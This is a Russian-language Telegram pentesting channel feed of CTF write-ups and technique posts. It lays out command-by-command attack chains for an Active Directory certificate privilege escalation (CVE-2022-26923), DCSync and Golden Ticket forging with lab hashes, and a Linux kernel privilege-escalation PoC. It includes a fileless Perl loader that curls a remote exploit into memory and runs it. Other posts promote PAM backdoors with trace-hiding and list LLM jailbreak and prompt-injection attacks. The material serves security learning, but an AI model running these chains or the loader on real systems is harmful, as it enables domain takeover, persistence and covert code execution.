Путь до хакера | Cyber security
1.02K subscribers
71 photos
2 videos
17 files
139 links
Блог об информационной безопасности 👾

Всё, что тебе нужно, здесь: https://github.com/artroneee/Cyber-Security-Collection

По всем вопросам:
@artrone
@cherepawwka
Download Telegram
Не знаю почему, но свое возвращение хотелось бы начать с райтапа 🤨

Тачка: Системный администратор
Категория: Active Directory
Платформа: Codeby Games

Читать: тык

UPD: Кстати, как относитесь к райтапам? Есть идея выложить целых 5 штук по этой категории на платформе Codeby. Интересно будет?

#active_directory #райтап
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).

🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
# Установка
pip install certipy-ad

# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
Начнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'
Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #active_directory
Please open Telegram to view this post
VIEW IN TELEGRAM
Тачка: Королевство
Категория: Active Directory
Платформа: Codeby Games

Закрепляем навыки атак на контроллер домена Active Directory🖼:
пылесосим сетевые ресурсы,
перечисляем LDAP,
устраиваем прожарку Kerberos,
дампим доменного администратора😉

Читать: тык

P.S. Скоро будет не только текстовый формат

#active_directory #райтап
👾Закрепление в системе через RDP👾

Рассмотрим необычный способ закрепиться в системе, используя дефолтную служебную прогу utilman.exe

Читать: тык
Смотреть: тык


UPD: Что ж, материал переходит на новый уровень, как и обещал. Прошу обратную связь, касательно видео подачи.
#персист
🎉 Всех с наступающим 🎉

Хотелось бы всем пожелать упорства, трудолюбия и побольше мотивации 😇
🚪PAM backdoor for SSH Часть 1/2🚪

В данной статье мы рассмотрим создание собственного модуля PAM для закрепления в системе, научимся правильно редачить конфиги и заметать следы своего присутствия.

Читать: https://teletype.in/@hackerblog/pam_backdoor_part_1
Смотреть: https://www.youtube.com/watch?v=puf7jLTga1o

UPD: вторая часть будет на днях
#персист
🚪PAM backdoor Часть 2/2🚪

Во второй части статьи мы углубляемся в тему внедрения backdoor'ов, рассматривая PAM. Мы пройдем через процесс изменения исходного кода в личных целях и его замены с легитимным файлом, освещая ключевые моменты и рассматривая общие техники ухода от детектирования.

Читать: https://teletype.in/@hackerblog/pam_backdoor_part_2
#персист
🐧Введение в Metasploit Framework🐧

Этот материал подойдёт для тех, кто никогда не работал с Command & Control (C&C, C2) фрэймворком Metasploit или просто хочет познакомиться с ним получше💻

Здесь мы рассмотрим:
🔵Расположение фрэймворка и структуру модулей;
🔵Типы полезных нагрузок;
🔵Поставляемый вместе с фрэймворком генератор полезных нагрузок msfvenom;
🔵Работу с модулем на примере эксплойта EternalBlue;
🔵 Обработчик входящих соединений, поддерживающий нагрузки, поставляемые MSF;
🔵Возможности meterpreter;
🔵Постэксплуатационные модули;
🔵Дамп SAM и DCSync при помощи модуля Kiwi🥝

Читать: https://teletype.in/@hackerblog/metasploit
#пентест #софт
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Сергей Зыбнев)
🔻Mama AMA Criminal - AMA эфир
#AMA

Что такое AMA (Ask Me Anything) эфир? Стрим, когда вы мне сможете задавать любые адекватные и даже личные вопросы в разумных рамках. Подобное уже делал уважаемый @CuriV на своем канале @pathsecure. Не реклама, если что 🌚 Формат зашёл, решил у себя устроить подобное)

Основная повестка встречи: Проект Похек, рефлексия про прошлое и будущее, ИБ-неИБ и т.д.

📆 Дата: 17 февраля (суббота), 14:00

Запись встречи будет

Буду благодарен коллегам за репост!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Привет🤝
Реализовал небольшой проектик по частичной автоматизации и упрощению работы с продуктом PT NAD. Основной целью было познакомиться с API NAD'а, а также немного прокачать Python скиллы🐍
Надеюсь, данная программа немного облегчит жизнь коллегам-мониторщикам 🙃
Название: RepNAD
Краткое описание: Программа позволяет в автоматическом режиме создавать/пополнять репутационные списки на основе ВПО, которые парсятся из скачанного JSON файла.
Основные функции:
•Автоматическое создание/добавление контента в репутационный список
•Ручное управление данными
•Просмотр содержимого репутационного списка
•и др.
Ознакомиться подробнее и скачать исходники тут: https://github.com/artroneee/RepNad/
#софт #полезные_материалы
Forwarded from wr3dmast3r vs pentest
Сегодня мы познакомимся с уязвимостью Prototype Pollution, вспомним основы, а также посмотрим на практический пример эксплуатации данной уязвимости с использованием гаджетов и обходом фильтрации.

Дополнительно покажу несколько утилит, которые облегчат поиск и эксплуатацию данной уязвимости.

https://telegra.ph/Dirty-JavaScript--Prototype-Pollution-02-22
Привет!🤝
Недавно обнаружил крутую фичу в Burp Suite - макросы
Настолько я удивился такому функционалу, что решил написать коротенькую статью про это😁
Читать: https://teletype.in/@hackerblog/j5dnrOte0dt

Отпишитесь, кто знал, что такая тема есть.
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086

#CVE #linux #privesc

PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.

PoC:
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit


Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
perl -e '
require qw/syscall.ph/;

my $fd = syscall(SYS_memfd_create(), $fn, 0);
system "curl https://example.com/exploit -s >&$fd";
exec {"/proc/$$/fd/$fd"} "memfd";
'


Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE

➡️ Github PoC

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (ELK Enjoyer)
🎫Немного о Golden Ticket🎫

Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩‍💻:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser


Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!

Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️

Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.

Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.

Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
apt install python3-impacket

После обновления выпустить золотой билет можно следующей командой:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser

При этом обратная совместимость со старым PAC так же останется:
python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username


Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass


Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (ELK Enjoyer)
Forwarded from PWN AI (Artyom Semenov)
https://github.com/prompt-security/ps-fuzz

Интересный фаззер для LLM, который имеет поддержку огромного количества моделей (есть даже поддержка GigaChat и YaGPT !!!! ). Он проводит фаззинг-тестирование и пытается определить возможно ли реализовать jailbreak и prompt-injection уязвимости:

Это список атак, которые он пытается реализовать:

Jailbreak:

AIM Jailbreak
Affirmative Suffix
Amnesia
Contextual Redirection
Do Anything Now Jailbreak (DAN)
Harmful Behavior
Linguistic Evasion
Self Refine
UCAR
Base64 Evasion

Prompt Injection:

Authoritative Role Impersonation
Complimentary Transition
Ethical Compliance
Typoglycemia Attack

System prompt extraction:

System Prompt Stealer
🔓 Сила шифрования или как я выявил недостаток работы Defender’а 🔓

В данной статье рассмотрим, как технологии шифрования помогают в защите конфиденциальности и целостности данных, а также как современные средства безопасности могут оказаться недостаточными для полноценный защиты.

Читать: https://teletype.in/@hackerblog/PtB5Fw2oQbX

UPD: Ура-ура! Наконец, я закончил, наверное, самый трудозатратный ресёрч на канале, который занял у меня 3 месяца. Посты теперь будут выходить чаще.